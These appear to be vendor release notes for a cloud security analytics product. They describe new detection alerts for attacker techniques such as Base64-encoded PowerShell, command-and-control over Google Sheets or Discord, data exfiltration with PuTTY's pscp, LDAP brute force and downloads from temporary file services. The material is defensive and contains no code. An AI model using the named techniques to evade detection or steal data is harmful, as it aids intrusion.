Secure Cloud Analytics Release Notes

Base64 Encoding Detected Alert: This new alert indicates Base64 strings were detected as part of the PowerShell command line. Detection is based on a combination of regular expressions and encoded commands. Attackers often use Base64 encoding as an obfuscation technique to hide malicious activity executed via PowerShell. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Cloud Spreadsheet API C2 Channel Alert: This new alert indicates a cloud spreadsheet Application Programming Interfaces (APIs) may be utilized by threat actors and malware for command and control, such as utilizing Google Sheets or Microsoft Excel as a C2. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Connection to Raw Public IP Address Alert: This new alert indicates a connection was made to a raw public IP, or in other words an external connection without a domain name specified, from a process or file type where this is unusual. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

LDAP Brute Force Attempt Alert: This new alert indicates a device ran more than 100 requests on port 389 or 636 within 5 minutes. This is a suspicious behavior and can indicate an attempt to bruteforce passwords over the LDAP protocol. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Malware Communication Identified via EVE Alert: This new alert indicates the Encrypted Visibility Engine (EVE) detected communication between a process and a server that is suspected to be malware. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.

Potential Misuse of the PuTTY Secure Copy Client Alert: This new alert indicates use of the PuTTY Secure Copy Client (pscp.exe) was detected. Although the PuTTY Secure Copy Client is utilized for legitimate purposes, threat actors have been known to use this tool to exfiltrate victim data to their infrastructure. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Suspicious DNS over HTTPS Activity Alert: This new alert indicates an internal server was detected exchanging traffic with a known DNS over HTTPS server. This may indicate an attempt to evade DNS-based security. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.

Suspicious Download from Temporary File Service Alert: This new alert indicates a temporary file service was used to download content using a command line interpreter. Adversaries may use temporary file services to download and execute malicious code or for exfiltration purposes. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Suspicious Request to Discord Alert: This new alert indicates a suspicious attempt to communicate with the Discord chat service using a tool other than the Discord desktop application or a web browser. Adversaries have been known to use Discord in this manner for C2 communications. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Use of Evasive VPN - External proxy Alert: This new alert indicates the Encrypted Visibility Engine (EVE) detected use of an evasive Virtual Private Network (VPN) provider or an external proxy. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.

Use of Remote Access Tools Alert: This new alert indicates the Encrypted Visibility Engine (EVE) detected use of remote access tools. Remote access tools may be utilized legitimately by systems administrators, but are also known to be utilized by threat actors, including Advanced Persistent Threats. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.

Unusual Encoding on Command Line Alert: This new alert indicates adversaries may be obfuscating their payloads through encoding schemes such as ASCII, Hex, bytecode, Unicode, and others. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

VBS Script Connected to a Raw Public IP Alert: This new alert indicates Visual Basic Scripts may have been used to download malware from a raw IP address. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.